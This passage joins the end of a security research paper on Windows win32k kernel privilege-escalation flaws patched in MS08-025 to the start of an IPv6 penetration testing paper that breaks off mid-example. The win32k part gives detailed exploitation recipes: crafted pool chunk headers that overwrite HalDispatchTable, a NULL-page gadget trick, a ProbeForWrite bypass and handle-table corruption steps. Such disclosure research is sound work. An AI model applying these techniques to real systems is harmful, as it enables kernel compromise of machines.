doing anything else. The ReturnLength check implements its own
verification, which relies directly on MmUserProbeAddress. This variable
marks the separation between the user-mode and kernel-mode address
spaces. In case of an invalid address, an exception is raised by writing
to the address it holds, which is read-only. The ProbeForRead and
ProbeForWrite verification routines likewise raise an exception if an
incorrect address is encountered. However, the win32k driver does not
always follow this pattern:
BOOL NtUserSystemParametersInfo(
    UINT uiAction,
    UINT uiParam,
    PVOID pvParam,
    UINT fWinIni)
{
    [...] // Prepare local variables
    switch (uiAction)
    {
    case SPI_1:
        // Custom checks
        break;
    case SPI_2:
        size = sizeof(Struct2);
        goto prob_read;
    case SPI_3:
        size = sizeof(Struct3);
        goto prob_read;
    case SPI_4:
        size = sizeof(Struct4);
        goto prob_read;
    case SPI_5:
        size = sizeof(Struct5);
        goto prob_read;
    case SPI_6:
        size = sizeof(Struct6);
    prob_read:
        ProbeForRead(pvParam, size, 4);
        [...]
    }
    [...] // Perform actions
}
This function is very complex, and this example presents only a small
part of its checks. Some parameters need only classic verification while
others implement their own. Such elaborate code can create confusion,
which improves the chances of a local privilege escalation. The issue
comes from an unusual kernel function that handles multiple features at
the same time without implementing a standardized function prototype. The
Windows kernel solved this issue for the NtSet* and NtQuery* functions by
using two simple arguments: the first is a classical buffer and the
second is its size. For example, the NtQueryInformationPort function
checks the buffer in a generic way and then only verifies that the size
corresponds to the specified feature. The win32k design simplifies GUI
development but makes code review very difficult.
2.2) KeUserModeCallback utilization
Typical interaction between user-mode and kernel-mode is done via
syscalls: a user-mode module requests that the kernel execute an action
and return the needed information. The win32k driver has a callback
system to do the exact opposite. The KeUserModeCallback function calls a
user-mode function from kernel-mode. This function is undocumented and is
provided by the kernel module in a secure way in order to switch into
user-mode properly. The win32k driver uses this functionality for common
tasks such as loading a DLL module for event catching or retrieving
information. The prototype of this function is:
NTSTATUS KeUserModeCallback (
IN ULONG ApiNumber,
IN PVOID InputBuffer,
IN ULONG InputLength,
OUT PVOID *OutputBuffer,
IN PULONG OutputLength
);
Microsoft did not build a system to retrieve arbitrary user-mode function
addresses from the kernel. Instead, the win32k driver has a fixed set of
functions that it needs to call. This list is kept in an undocumented
function table referenced by the Process Environment Block (PEB)
structure of each process. The ApiNumber argument is an index into this
table.
In order to return to user-mode, KeUserModeCallback retrieves the
user-mode stack address from the saved user-mode context stored in the
thread's KTRAP_FRAME structure. It saves the current stack level and uses
ProbeForWrite to check that there is enough room for the input buffer.
The InputBuffer argument is then copied onto the user stack and an
argument list is created for the function being called. The
KiCallUserMode function prepares the return to user-mode by saving
important information on the kernel stack. This callback system works
like a normal syscall exit procedure, except that the stack level and eip
register have been changed. The callback starts in the
KiUserCallbackDispatcher function.
VOID KiUserCallbackDispatcher(
IN ULONG ApiNumber,
IN PVOID InputBuffer,
IN ULONG InputLength
);
The user-mode function KiUserCallbackDispatcher receives an argument list
which contains ApiNumber, InputBuffer, and InputLength. It dispatches to
the appropriate function using the PEB dispatch table. When it is
finished, the routine invokes interrupt 0x2b to transfer control back to
kernel-mode. In turn, the kernel inspects three registers:
- ecx: contains a user-mode pointer for OutputBuffer
- edx: contains OutputLength
- eax: contains the return status
The KiCallbackReturn kernel-mode function handles the 0x2b interrupt and
passes these registers as arguments to the NtCallbackReturn function.
Everything is cleaned up using the information saved on the kernel stack,
and control returns to the previously called KeUserModeCallback function
with the output arguments set.
The reader should notice that nothing is done to check the output data.
Each kernel function that uses the user-mode callback system is
responsible for verifying its output data. An attacker can simply hook
the KiUserCallbackDispatcher function and filter requests in order to
control the output pointer, size, and data. This user-mode call
represents an important issue wherever its output is not verified as
rigorously as system call arguments.
3) Discovery and exploitation
The win32k driver was patched by the MS08-025 bulletin[1]. This bulletin
did not disclose any details about the issues, but it did describe a
vulnerability which allows privilege elevation through invalid kernel
checks. The patch increases overall driver security by adding multiple
verifications. In fact, it was due to three different reported
vulnerabilities. The following sections explain how these vulnerabilities
were discovered and exploited.
3.1) DDE Kernel pool overflow
The Dynamic Data Exchange (DDE) protocol is a message system integrated
into the GUI. Although the Windows operating system already has many
different message mechanisms, this one shares data across processes by
sharing GUI handles and memory sections. The feature is quite old but
still supported by Microsoft applications such as Internet Explorer, and
it is used in application firewall bypass techniques. During the author's
research on the win32k driver, he investigated how the KeUserModeCallback
function was used. As described previously, this function does not
directly verify output data. This lack of validation is what leads to
this vulnerability.
3.1.1) Vulnerability details
The vulnerability exists in win32k's xxxClientCopyDDEIn1 function. It is
not called directly, but is used internally by the kernel when messages
are exchanged between processes using the DDE protocol. In this context,
the OutputBuffer verification is analyzed.
In the xxxClientCopyDDEIn1 function:
lea eax, [ebp+OutputLength]
push eax
lea eax, [ebp+OutputBuffer]
push eax
push 8 ; InputLength
lea eax, [ebp+InputBuffer]
push eax
push 32h ; ApiNumber
call ds:__imp__KeUserModeCallback@20
mov esi, eax ; return < 0 (error ?)
call _EnterCrit@0
cmp esi, edi
jl loc_BF92C6D4
cmp [ebp+OutputLength], 0Ch ; Check output length
jnz loc_BF92C6D4
mov [ebp+ms_exc.disabled], edi ; = 0
mov edx, [ebp+OutputBuffer]
mov eax, _Win32UserProbeAddress
cmp edx, eax ; Check OutputBuffer address
jb short loc_BF92C5DC
[...]
loc_BF92C5DC:
mov ecx, [edx]
loc_BF92C5DE:
mov [ebp+var_func_return_value], ecx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push 2
pop esi
cmp ecx, esi ; first OutputBuffer ULONG must be 2
jnz loc_BF92C6D4
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx ; = 1
mov [ebp+ms_exc.disabled], esi ; = 2
mov ecx, [edx+8] ; OutputBuffer - user mode ptr
cmp ecx, eax ; Win32UserProbeAddress - check user mode ptr
jnb short loc_BF92C602
[...]
loc_BF92C602:
push 9
pop ecx
mov esi, eax
lea edi, [ebp+copy_output_data]
rep movsd
mov [ebp+ms_exc.disabled], ebx ; = 1
push 0
push 'EdsU'
mov ebx, [ebp+copy_output_data.copy1_size] ; we control this
mov eax, [ebp+copy_output_data.copy2_size] ; and this
lea eax, [eax+ebx+24h] ; integer overflow right here
push eax ; NumberOfBytes
call _HeavyAllocPool@12
mov [ebp+allocated_buffer], eax
test eax, eax
jz loc_BF92C6B6
mov ecx, [ebp+var_2C]
mov [ecx], eax ; save allocation addr
push 9
pop ecx
lea esi, [ebp+copy_output_data]
mov edi, eax
rep movsd ; Copy output data
test ebx, ebx
jz short loc_BF92C65A
mov ecx, ebx
mov esi, [ebp+copy_output_data.copy1_ptr]
lea edi, [eax+24h]
mov edx, ecx
shr ecx, 2
rep movsd ; copy copy1_ptr (with copy1_size)
mov ecx, edx
and ecx, 3
rep movsb
loc_BF92C65A:
mov ecx, [ebp+copy_output_data.copy2_size]
test ecx, ecx
jz short loc_BF92C676
mov esi, [ebp+copy_output_data.copy2_ptr]
lea edi, [ebx+eax+24h]
mov edx, ecx
shr ecx, 2
rep movsd ; copy copy2_ptr (with copy2_size)
mov ecx, edx
and ecx, 3
rep movsb
The DDE copydata buffer contains two different buffers with their
respective sizes. These sizes are used to calculate the size of a buffer
that is allocated. However, no checks are made to detect whether an
integer overflow occurs. An integer overflow happens when an arithmetic
operation between integers would exceed the maximum integer value and
therefore wraps around to a lower value. As such, the allocated buffer
may be smaller than each source buffer, which leads to a kernel pool
overflow. The pool is the name used to designate the Windows kernel heap.
3.1.2) Pool overflow exploitation
The key to exploiting this issue lies in how to exploit a kernel pool
overflow in general. Previous work has described the kernel pool system
and its exploitation[8,9]. This paper will focus on exploiting the
vulnerability being described.
The kernel pool can be thought of as a heap. Memory is allocated by the
ExAllocatePoolWithTag function and then freed using the ExFreePoolWithTag
function. Depending on the memory size, a chunk header precedes the
memory data. Exploiting a pool overflow involves replacing the next
chunk's header with a crafted version. This header is available through
the ntoskrnl module symbols as:
typedef struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize : 9;
            USHORT PoolIndex : 7;
            USHORT BlockSize : 9;
            USHORT PoolType : 7;
        };
        ULONG32 Ulong1;
    };
    union
    {
        struct _EPROCESS* ProcessBilled;
        ULONG PoolTag;
        struct
        {
            USHORT AllocatorBackTraceIndex;
            USHORT PoolTagHash;
        };
    };
} POOL_HEADER, *PPOOL_HEADER; // sizeof(POOL_HEADER) == 8
The size fields are expressed in multiples of 8 bytes, as an allocated
block is always 8-byte aligned. The Windows 2000 pool architecture is
different: memory blocks are aligned on 16 bytes and the type flags are a
simple UCHAR (no bitfields). The PoolIndex field is not important for our
overflow and can be set to 0. The PoolType field contains the chunk state
with multiple possible flags. The busy flag changes between operating
system versions, but a free chunk always has its PoolType field set to
zero.
During a pool overflow, the next chunk header is overwritten with
malicious values. When the allocated block is freed, the
ExFreePoolWithTag function will look at the next block's type. If the
next block is free, it is coalesced by unlinking it and merging it with
the current block. The LIST_ENTRY structure links free blocks together
and is adjacent to the POOL_HEADER structure when the chunk is free. The
unlinking procedure is exactly the same as in the user-mode heap, except
that no safe-unlinking check is done. The procedure is then repeated for
the previous block. Many papers have already explained unlink
exploitation, which allows writing 4 bytes to a controlled address.
However, this attack breaks the pool's internal linked list, and
exploitation must take this into consideration: it is necessary to
restore the list's integrity to prevent the system from crashing.
There are a number of different addresses that may be overwritten, such
as code itself or the contents of a function pointer. In local kernel
exploitation, the target address should be one rarely used by the kernel,
to prevent operating system instability. In his paper, Ruben Santamarta
used a function pointer accessible through an exported kernel variable
named HalDispatchTable[10]. This function pointer is used by
KeQueryIntervalProfile, which is called by the NtQueryIntervalProfile
system call. Overwriting the function pointer at HalDispatchTable+4 does
not break system behavior, as this function is unsupported in the default
configuration. A clean privilege escalation should still consider
restoring the overwritten data. For our exploitation, this is the best
choice as it is easy to launch and target.
The exploitation code for this particular vulnerability should produce
the following fake chunk:
Fake next pool chunk header for Windows XP / 2003:
PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 8
PoolIndex = 0
BlockSize = (sizeof(POOL_HEADER) + 8) / 8
PoolType = 0 // Free chunk
Flink = Execute address - 4 // in userland - call +4 address
Blink = HalDispatchTable + 4 // in kernelland
Modification for Windows 2000 support:
PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 16
BlockSize = (sizeof(POOL_HEADER) + 15) / 16
The Flink field points 4 bytes before a user-mode address that will be
called from kernel mode once the function pointer at Blink has been
replaced. When called by the kernel, the user-mode code executes at ring0
and can modify operating system behavior.
For this specific vulnerability, to avoid a crash and to control the data
copied into the target memory buffer, copy2_ptr should point to a
NOACCESS memory page. When the copy occurs, an exception is raised and
caught by a try/except block in the function, and the allocated buffers
are freed. The copied memory size is controlled by the copy1_size field
while the integer overflow is produced by the copy2_size field. This
configuration makes it possible to overflow only the necessary part.
3.1.3) Delayed free pool overflow on Windows Vista
The pool type used for win32k allocations on Windows Vista includes an
undocumented DELAY_FREE flag. With this flag, the ExFreePoolWithTag
function does not release a memory block but instead pushes it onto a
deferred free list. If the kernel needs more memory or the deferred free
list is full, it pops an entry off the list and frees it through the
normal path. This causes a problem because the actual free may not occur
until many minutes later, in a potentially different process context. Due
to this, both the Flink and Blink pointers must reside in the kernel-mode
address space.
The HalDispatchTable overwrite technique can be reused to support this
configuration. The KeQueryIntervalProfile function disassembly shows how the
function pointer is used. This context is always the same across Windows
versions.
mov [ebp+var_C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_C]
push eax
push 0Ch
push 1
call off_47503C ; xHalQuerySystemInformation(x,x,x,x)
The first and second arguments point into user-mode, inside the NULL
page. This page can be allocated using the NtAllocateVirtualMemory
function with an unaligned address within the NULL page: the kernel
rounds the pointer down to the lower page boundary and allocates that
page. The same page is also used in kernel NULL pointer dereference
vulnerabilities. In order to exploit this context, a stub of machine code
must be found which returns into the first argument and where the next 4
bytes can be overwritten. This is the case for function epilogues, as in
the wcslen function:
.text:00463B4C sub eax, [ebp+arg_0]
.text:00463B4F sar eax, 1
.text:00463B51 dec eax
.text:00463B52 pop ebp
.text:00463B53 retn
.text:00463B54 db 0CCh ; alignment padding
.text:00463B55 db 0CCh
.text:00463B56 db 0CCh
.text:00463B57 db 0CCh
.text:00463B58 db 0CCh
In this example, the address 00463B51h fits our needs. The pop
instruction discards the return address and the retn instruction then
returns to the first argument value, 1, inside the allocated NULL page.
The alert reader will have noticed that the selected address starts at
the dec instruction: the unlinking procedure also overwrites the next 4
bytes, and the 00463B54h address is followed by 5 padding bytes. Without
this padding, overwriting unknown assembly could lead to a crash,
compromising the exploitation. The location of this target address
changes depending on the operating system version, but this type of
context can be found using pattern matching. On Windows Vista, the
exploitation loops calling the NtQueryIntervalProfile function until the
deferred free occurs and exploitation succeeds. This loop is mandatory,
as the pool's internal structure must be corrected.
3.2) NtUserfnOUTSTRING kernel overwrite vulnerability
The NtUserfnOUTSTRING function is reachable through an internal table
used by the exported NtUserMessageCall function. Functions whose names
start with "NtUserfn" can be invoked via the SendMessage function
exported by the user32.dll module; for this function the WM_GETTEXT
window message is used. Notice that in some cases a direct call is needed
for successful exploitation. The verifications made by the SendMessage
function are trivial, as it is shared by many functions, but they should
be considered. The MSDN website describes SendMessage usage[3].
3.2.1) Evading ProbeForWrite function
The ProbeForWrite function verifies that an address range resides in the
user-mode address space and is writable. If not, it raises an exception
that can be caught by a try/except block. This function is used heavily
by drivers that deal with user-mode inputs. The following is the start of
the ProbeForWrite function's assembly:
void __stdcall ProbeForWrite(PVOID Address, SIZE_T Length, ULONG Alignment)
mov edi, edi
push ebp
mov ebp, esp
mov eax, [ebp+Length]
test eax, eax
jz short loc_exit ; Length == 0
[...]
loc_exit:
pop ebp
retn 0Ch
This short assembly dump highlights one way to evade the ProbeForWrite
function: if the Length argument is zero, no verification is done on the
Address argument. This means Microsoft considers that a zero-length input
does not require the address to point into userland. Microsoft wrote a
blog post about MS08-025[12] explaining why ProbeForWrite was not
modified as might be expected. Microsoft's compatibility concern is
understandable, but at the very least the ProbeForWrite documentation
should be updated to mention this case.
3.2.2) Vulnerability details
This vulnerability touches not only this function but a whole class of
string management functions. Some functions make sure that the length
argument is not zero before modifying it; others do not check the length
argument at all. A proof of concept for this vulnerability was published
by Ruben Santamarta[11]. The NtUserfnOUTSTRING vulnerability evades the
ProbeForWrite check and overwrites 1 or 2 bytes of kernel memory. The
function's disassembly is shown below:
In NtUserfnOUTSTRING (WM_GETTEXT)
xor ebx, ebx
inc ebx
push ebx ; Alignment = 1
and eax, ecx ; eax = our size | ecx = 0x7FFFFFFF
push eax ; If our size is 0x80000000 then
; Length is zero (avoid any check)
push esi ; Our kernel address
call ds:__imp__ProbeForWrite@12
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+arg_14]
add eax, 6
and eax, 1Fh
push [ebp+arg_10]
lea ecx, [ebp+var_24]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, _gpsi
call dword ptr [ecx+eax*4+0Ch] ; Call appropriate sub function
mov edi, eax
test edi, edi
jz loc_BF86A623 ; Something goes wrong
[...]
loc_BF86A623:
cmp [ebp+arg_8], eax ; Submit size was 0 ? (no)
jz loc_BF86A6D1
[...]
push [ebp+arg_18] ; Wide or Multibyte mode
push esi ; Our address
call _NullTerminateString@8 ; <== 0 byte or short overwriting
In this function, a large size (0x80000000) bypasses the ProbeForWrite
verification. After this check, the function calls a sub-function through
win32k's internal function pointer table; which one depends on the
calling context. If the call is made from the thread that owns the
submitted handle, it goes directly to the retrieval function; otherwise
the request can be queued for the thread that owns the handle. The
assembly sample highlights the null byte overwrite performed when the
other functions fail: the null byte ensures that a valid string is
returned. This is not the only way to overwrite memory; by using an edit
box, we could overwrite kernel memory with a custom string, but the first
way fits the need.
The exploitation is trivial and will not be detailed here. The first
vulnerability already exposed a suitable target address and the way to
allocate the NULL page, both of which were used to demonstrate this
vulnerability.
3.3) LoadMenu handle table corruption
The win32k driver implements its own handle mechanism. This system shares
a handle table between user-mode and kernel-mode: the table is mapped
read-only into the user-mode address space and modified from the
kernel-mode address space. The MS07-017 vulnerability found by Cesar
Cerrudo during the Month of Kernel Bugs (MOKB)[13] describes this table
and how its modification could permit kernel code execution. This chapter
addresses another vulnerability, based on misuse of a GDI shared handle
table entry.
3.3.1) Handle table
In the GUI architecture, a handle encodes several pieces of information,
such as an index into the shared handle table and the object type. The
handle table is an array of the undocumented HANDLE_TABLE_ENTRY
structure.
typedef struct _HANDLE_TABLE_ENTRY
{
union
{
PVOID pKernelObject;
ULONG NextFreeEntryIndex; // Used on free state
};
WORD ProcessID;
WORD nCount;
WORD nHandleUpper;
BYTE nType;
BYTE nFlag;
PVOID pUserInfo;
} HANDLE_TABLE_ENTRY; // sizeof(HANDLE_TABLE_ENTRY) == 12
The nType field defines the table entry type. A free entry has type zero,
and the nFlag field defines whether it is destroyed or currently in the
destroy procedure. Normal handle verification routines check this value
before fetching the pKernelObject field, which points to the associated
kernel object. In a free entry, the NextFreeEntryIndex field contains the
index of the next free entry; it is not a pointer but a simple unsigned
long value.
The GUI object structure depends on the object type, but every object
starts with the same structure, which contains its corresponding index in
the shared handle table. The architecture relies on both elements,
switching between table entry and kernel object as needed. A security
issue arises if the handle table is not used as intended.
3.3.2) Vulnerability details
The vulnerability itself exists in win32k's xxxClientLoadMenu function,
which does not correctly validate a handle index. This function is called
by the GetSystemMenu function and returns to user-mode using the
KeUserModeCallback function to retrieve a handle index. The following
assembly shows how this value is used.
and eax, 0FFFFh ; eax is controlled
lea eax, [eax+eax*2] ; index * 3
mov ecx, gSharedTable
mov edi, [ecx+eax*4] ; base + (index * 12)
This assembly sample uses an unchecked handle index and returns the
pKernelObject field value of the target entry. This pointer becomes the
return value of the xxxClientLoadMenu function. Proper verifications are
not made, which permits manipulation of a deleted handle. A deleted
handle has its NextFreeEntryIndex field set between 0x1 and 0x3FFF, so
the returned value will lie within the first memory pages.
A system menu is linked to a window object. This window object is
designated by a handle passed as an argument to the GetSystemMenu
function. The spmenuSys field of the window object is set to the value
returned by the xxxClientLoadMenu function. In this specific context, the
spmenuSys value is hard to predict but lies inside the NULL page. During
thread exit, the window destruction code will look at the spmenuSys
object and, using the index it contains, toggle the corresponding shared
table entry's nFlag field to destroyed and its nType to free. If the NULL
page is filled with zero values, this destroys the first entry in the GDI
shared handle table.
Exploitation is achieved by reusing the vulnerable functions once the
first entry has been destroyed. The GetSystemMenu function locks and
unlocks the GDI shared handle table entry linked with the kernel object
returned by the xxxClientLoadMenu function. If the entry's flag is set to
destroyed, the unlock function calls the destroy callback for the entry's
type. For the first entry, the flag has been set to destroyed, but there
is no callback for its type, as it is never supposed to be unlocked: the
unlock function therefore calls address zero, which allows kernel code
execution. This specific handle management architecture remains
undocumented, and the purpose of a release callback inside the thread
unlocking procedure is unusual.
Exploitation steps:
1. Allocate the NULL page.
2. Exploitation loop (the second iteration triggers the call to zero):
   a. Create a dialog.
   b. Set the NULL page data to zero.
   c. Set a relative jmp at address zero.
   d. Create a menu graphic handle (or another type).
   e. Destroy this menu handle.
   f. Call GetSystemMenu.
   g. Intercept the user callback and return the destroyed menu handle
      index (the handle masked with 0x3fff).
   h. Exit this thread, which sets handle entry zero as free and
      destroyed.
There are multiple ways to exploit this vulnerability. The author
believes that exploiting the locking procedure in this way could also
serve for handle leak vulnerabilities, as it did here. This exploitation
remains complex and unusual, and the specific context makes it all the
more interesting.
4) GUI architecture protection
Creating safe software is a hard task, definitely harder than finding
vulnerabilities. The work is even harder when it concerns old components
which must respect compatibility rules. This article does not blame
Microsoft for these vulnerabilities; it presents global issues in the
Windows architecture. With Windows Vista, Microsoft started securing its
operating system environment, and the Windows Vista code base is
definitely safer than it was. Still, some kernel components such as the
win32k driver are not safe enough and should be treated as a priority in
local operating system security.
The GUI architecture does not respect security basics. Starting from
scratch would certainly be a good option if it were possible. The global
organization of this driver makes security audits a mess. On the other
hand, the Windows API shows that it answers developers' needs. There is a
big abstraction layer between the userland API and the kernel functions,
and it could be used to rebuild the win32k driver without breaking
compatibility. The API must follow user needs and be as easy as it can
be, but there is no reason the driver's exported functions could not be
redesigned in a secure way. This represents an enormous amount of work
which could only be spread across operating system versions; nevertheless
it is necessary. Such a modification could also increase performance by
reducing unneeded context switching: there is no good reason to enter the
kernel to ask userland for a value that will simply be returned to
userland. The user-mode callback system does not fit in a consistent GUI
architecture.
Local exploitation techniques also highlight insecure components such as
the kernel pool, and show how overwriting certain function pointers
allows kernel code execution. In the past, userland was hardened because
exploitation was too easy and third-party software could allow
compromising a computer. Kernel performance is critical, and adding
verification routines and security measures could hurt that advantage.
The solution should be an operating system evolution that does not
restrict the user experience; hardware improvements do not excuse the
fact that modern operating systems require ever more resources.
Software development takes the fastest path except when a specific result
is expected: a company does not look for the best way but for whatever
costs less for almost the same result. Microsoft did not choose the easy
path when it started its Security Development Lifecycle (SDL)[14], and it
should continue in this direction.
5) Conclusion
The Windows kernel components have unequal levels of security
verification. The main kernel module (ntoskrnl.exe) applies standard
verifications when dealing with userland data. The win32k driver does not
follow the same rules, which results in messy verification algorithms.
This driver interacts heavily with userland through several mechanisms,
from the usual syscalls to the userland callback system, and this
architecture increases the attack surface. The vulnerable parts involve
not only the usual vulnerability classes but also internal mechanisms
such as the GUI handle system.
Chapter 3 exposed the discovery and exploitation of the vulnerabilities.
Local exploitation offers many different attack vectors. Nowadays, such
exploitation is fast and reliable: it works on every attempt. Kernel
exploitation is possible through several different techniques.
The win32k driver was not built with a secure design, and it has now
become so huge, with so many compatibility restrictions, that every
release just implements new features without changing anything else.
Windows Vista introduces many modifications, but most of them are just
automatic integer overflow checks. These will solve many unknown issues,
but the interaction between user-mode and kernel-mode remains hard to
predict. Vulnerabilities are not always a matter of missing checks; they
also come from system interaction and custom contexts.
Implementing the usual userland protections is not a sufficient solution,
as kernel exploitation covers more than overflows. The win32k driver
could change by using the userland abstraction layer in order to keep
compatibility. This choice is not the easiest, as it demands more time
and work. The patch discussed in this paper improves win32k security
somewhat, as it goes deeper than the reported vulnerabilities. However,
the Windows Vista version of the win32k driver was affected by two of the
vulnerabilities even though it was already more secure. Minor
modifications do not solve security issues. Overall kernel security has
been discussed in various papers about vulnerabilities and also rootkits.
Everyone agrees that operating systems must evolve. Windows Seven could
introduce a new, sound architecture which secures critical components, or
simply improve win32k driver security.
References
[1] Microsoft Corporation. Microsoft Security Bulletin MS08-025
http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
[2] Microsoft Corporation. Windows User Interface.
http://msdn.microsoft.com/en-us/library/ms632587(VS.85).aspx
[3] Microsoft Corporation. SendMessage function.
http://msdn.microsoft.com/en-us/library/ms644950.aspx
[4] ivanlef0u. You failed (blog entry about KeUsermodeCallback function in French).
http://www.ivanlef0u.tuxfamily.org/?p=68
[5] Microsoft Corporation. About Dynamic Data Exchange.
http://msdn.microsoft.com/en-us/library/ms648774.aspx
[6] Microsoft Corporation. DDE Support in Internet Explorer Versions (still supported in ie7).
http://support.microsoft.com/kb/160957
[7] Wikipedia. Integer overflow.
http://en.wikipedia.org/wiki/Integer_overflow
[8] mxatone and ivanlef0u. Stealth hooking : Another way to subvert the Windows kernel.
http://www.phrack.org/issues.html?issue=65&id=4#article
[9] Kostya Kortchinsky. Kernel pool exploitation (Syscan Hong Kong 2008).
http://www.syscan.org/hk/indexhk.html
[10] Ruben Santamarta. Exploiting common flaws in drivers.
http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=51
[11] Ruben Santamarta. Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n).
http://www.reversemode.com/index.php?option=com_content&task=view&id=50&Itemid=1
[12] Microsoft Corporation. MS08-025: Win32k vulnerabilities.
http://blogs.technet.com/swi/archive/2008/04/09/ms08-025-win32k-vulnerabilities.aspx
[13] Cesar Cerrudo. Microsoft Windows kernel GDI local privilege escalation.
http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
[14] Microsoft Corporation. Steve Lipner and Michael Howard. The Trustworthy Computing Security Development Lifecycle
http://msdn.microsoft.com/en-us/library/ms995349.aspx
uninformed/10.4.txt
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
10/2008
H D Moore
hdm@metasploit.com
Abstract: This paper illustrates how IPv6-enabled systems with link-local and
auto-configured addresses can be compromised using existing security tools.
While most of the techniques described can apply to "real" IPv6 networks, the
focus of this paper is to target IPv6-enabled systems on the local network.
Acknowledgments: The author would like to thank Van Hauser of THC for his
excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack
Toolkit. Much of the background information in this paper is based on notes
from Van Hauser's presentation. The 'alive6' tool included with the IPv6
Attack Toolkit is the critical first step for all techniques described in this
paper. The author would like to thank Philippe Biondi for his work on SCAPY
and for his non-traditional 3-D presentation on IPv6 routing headers at
CanSecWest 2007.
1) Introduction
The next iteration of the IP protocol, version 6, has been "just around the
corner" for nearly 10 years. Migration deadlines have come and gone,
networking vendors have added support, and all modern operating systems are
IPv6-ready. The problem is that few organizations have any intention of
implementing IPv6. The result is that most corporate networks contain machines
that have IPv6 networking stacks, but have not been intentionally configured
with IPv6. The IPv6 stack represents an attack surface that is often
overlooked in corporate environments. For example, many firewall products,
such as ZoneAlarm on Windows and the standard IPTables on Linux, do not block
IPv6 traffic (IPTables can, but it uses Netfilter6 rules instead). The goal of
this paper is to demonstrate how existing tools can be used to compromise IPv6
enabled systems.
1.2) Operating System
All tools described in this paper were launched from an Ubuntu Linux 8.04
system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux
distribution, some tools may work differently or not at all.
1.3) Configuration
All examples in this paper depend on the host system having a valid IPv6 stack
along with a link-local or auto-configured IPv6 address. This requires the
IPv6 functionality to be compiled into the kernel or loaded from a kernel
module. To determine if your system has an IPv6 address configured for a
particular interface, use the ifconfig command:
# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link
1.4) Addressing
IPv6 addresses consist of 128 bits (16 bytes) and are represented as eight groups
of four hex digits separated by colons. A set of two colons ("::") indicates
that the bits leading up to the next part of the address should be all zero.
For example, the IP address for the loopback/localhost consists of 15 NULL
bytes followed by one byte set to the value of 0x01. The representation for
this address is simply "::1" (IPv4 127.0.0.1). The "any" IPv6 address is
represented as "::0" or just "::" (IPv4 0.0.0.0). In the case of link-local
addresses, the prefix is always "fe80::" followed by the EUI-64 formatted MAC
address, while auto-configured addresses always have the prefix of "2000::".
The "::" sequence can only be used once within an IPv6 address (it would be
ambiguous otherwise). The following examples demonstrate how the "::" sequence
is used.
0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0
0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001
fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60
fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708
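These equivalences can be checked with Python's standard ipaddress module; a
minimal sketch:

```python
import ipaddress

# All spellings of the unspecified ("any") address collapse to "::".
for text in ("::", "::0", "0::0", "0:0::0:0"):
    assert ipaddress.IPv6Address(text).compressed == "::"

# The "::" rule also expands: "fe80::60" recovers all sixteen bytes.
addr = ipaddress.IPv6Address("fe80::60")
print(addr.exploded)  # fe80:0000:0000:0000:0000:0000:0000:0060
```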
1.5) Link-local vs Site-local
On a given local network, all IPv6 nodes have at least one link-local address
(fe80::). During the automatic configuration of IPv6 for a network adapter, a
link-local address is chosen, and an IPv6 router discovery request is sent to
the all-routers broadcast address. If any IPv6-enabled router responds, the
node will also choose a site-local address for that interface (2000::). The
router response indicates whether to use DHCPv6 or the EUI-64 algorithm to
choose a site-local address. On networks where there are no active IPv6
routers, an attacker can reply to the router discovery request and force all
local IPv6 nodes to configure a site-local address.
2) Discovery
2.1) Scanning
Unlike the IPv4 address space, it is not feasible to sequentially probe IPv6
addresses in order to discover live systems. In real deployments, it is common
for each endpoint to receive a 64-bit network range. Inside that range, only
one or two active nodes may exist, but the address space is over four
billion times the size of the entire IPv4 Internet. Trying to discover live
systems with sequential probes within a 64-bit IP range would require at
least 18,446,744,073,709,551,616 packets.
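The arithmetic behind these figures is straightforward to verify:

```python
# A 64-bit host range holds 2**64 addresses.
hosts = 2 ** 64
print(hosts)               # 18446744073709551616

# The entire IPv4 Internet holds 2**32 addresses, so the ratio is
# 2**32: a bit over four billion, matching the claim above.
print(hosts // 2 ** 32)    # 4294967296
```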
2.2) Management
In order to manage hosts within large IPv6 network ranges, DNS and other
naming services are absolutely required. Administrators may be able to
remember an IPv4 address within a subnet, but tracking a 64-bit host ID within
a local subnet is a challenge. Because of this requirement, DNS, WINS, and
other name services are critical for managing the addresses of IPv6 hosts.
Since the focus of this paper is on "accidental" IPv6 networks, we will not be
covering IPv6 discovery through host management services.
2.3) Neighbor Discovery
The IPv4 ARP protocol goes away in IPv6. Its replacement consists of the
ICMPv6 Neighbor Discovery (ND) and ICMPv6 Neighbor Solicitation (NS)
protocols. Neighbor Discovery allows an IPv6 host to discover the link-local
and auto-configured addresses of all other IPv6 systems on the local network.
Neighbor Solicitation is used to determine if a given IPv6 address exists on
the local subnet. The link-local address is guaranteed to be unique per-host,
per-link, by picking an address generated by the EUI-64 algorithm. This
algorithm uses the network adapter MAC address to generate a unique IPv6
address. For example, a system with a hardware MAC of 01:02:03:04:05:06 would
use a link-local address of fe80::0102:03FF:FE04:0506. An eight-byte interface identifier is
created by taking the first three bytes of the MAC, appending FF:FE, and then
the next three bytes of the MAC. In addition to link-local addresses, IPv6
also supports stateless auto-configuration. Stateless auto-configured
addresses use the "2000::" prefix. More information about Neighbor Discovery
can be found in RFC 2461.
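A short Python sketch of the derivation just described, following the text
exactly (note that RFC 4291's modified EUI-64 also flips the universal/local
bit of the MAC's first byte; the example address above omits that step, so
this sketch omits it too):

```python
import ipaddress

def link_local_from_mac(mac):
    """Derive a link-local address as described in the text: the first
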